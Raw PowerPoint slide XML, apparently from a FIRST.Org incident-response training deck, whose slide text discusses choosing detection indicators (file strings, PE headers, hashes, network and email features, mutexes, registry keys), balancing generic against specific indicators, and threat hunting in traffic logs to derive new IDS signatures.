              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Examples of good choices:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Files: hardcoded paths / characteristic strings in files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>PE Header elements</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Hashes (MD5 / SHA-1 / SHA-256) → sometimes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Network traffic patters (including URL, HTTP headers)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Malicious IPs, domains</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Email features (headers, subject, parts of body)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Memory: characteristic patterns</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>System: mutexes, process names, registry keys</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:fade thruBlk="1"/>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
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C1C1E55-12AA-1443-869E-78926736C29D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="350838"/>
            <a:ext cx="8228013"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90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Creating indicators: challenge</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39938" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D5C039C-2DC1-2A4C-B742-7C82CEC02E3E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="449263" y="1206500"/>
            <a:ext cx="8693150" cy="2979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29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1pPr>
            <a:lvl2pPr marL="293688" indent="-2921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2pPr>
            <a:lvl3pPr marL="647700" indent="-2159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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Balance between generic and specific</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Too generic:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Higher chance of false alarms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Misleading</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Example: patters that can occur in legitimate binaries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Too specific:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Often describe features easy to change by the attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Example: hashes of executable files</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:fade thruBlk="1"/>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1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B44FDC5E-0896-EF4D-8860-607107A1C54D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="350838"/>
            <a:ext cx="8228013"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90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2900" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Hunting or Exploratory Analysis  </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41986" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{794CA69E-9F21-7F43-8064-F59FDD8EDA92}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="449263" y="1135063"/>
            <a:ext cx="8144917" cy="30140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29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1pPr>
            <a:lvl2pPr marL="293688" indent="-2921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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Proactively searching or “hunting” for malicious activity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Discover anomalies and threats</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Problem: too much data (normal activity)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Identifying signals in noise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Some existing solutions but you will want to build your own eventually</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="41987" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B95C5874-1963-ED43-88BF-2AC5B810D3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0375" y="4259263"/>
            <a:ext cx="2271713" cy="183991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1988" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2359F71D-4399-3543-A12D-C355ED70B8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44642" y="4722813"/>
            <a:ext cx="1474788" cy="11049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Document 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B99377B-8420-934F-8E08-8195718A079B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1532558" y="4916389"/>
            <a:ext cx="1224136" cy="717749"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartDocument">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="92D05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eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Lucida Sans" panose="020B0602030504020204" pitchFamily="34" charset="77"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>traffic logs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Terminator 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{392D199E-F134-2E4B-B88B-5EE9C7E34305}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6807378" y="4823223"/>
            <a:ext cx="1904502" cy="904081"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartTerminator">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="92D05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eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Lucida Sans" panose="020B0602030504020204" pitchFamily="34" charset="77"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>New IDS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Lucida Sans" panose="020B0602030504020204" pitchFamily="34" charset="77"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>signature</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="5" name="Straight Arrow Connector 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6D6B23F-6ECA-4547-B0EF-2E5542095444}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2896612" y="5275263"/>
            <a:ext cx="1008112" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B8FF"/>
          </a:solidFill>
          <a:ln w="1016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Straight Arrow Connector 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B6A8387-E1E7-3042-9DC0-180D251DCD72}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5659348" y="5275263"/>
            <a:ext cx="1008112" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B8FF"/>
          </a:solidFill>
          <a:ln w="1016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spd="slow">
    <p:fade thruBlk="1"/>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hape 68">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9DBDB64-D80F-034B-AECB-9403063B4A82}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1479550"/>
            <a:ext cx="8293100" cy="4703763"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="45700" rIns="91425" bIns="45700"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="-101600" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buSzPts val="1600"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Copyright © by Forum of Incident Response and Security Teams, Inc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="-101600" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="750"/>
              </a:spcBef>
              <a:buSzPts val="1600"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="1600">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>FIRST.Org is name under which Forum of Incident Response and Security Teams, Inc. conducts business.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="-101600" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="750"/>
              </a:spcBef>
              <a:buSzPts val="1600"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:br>
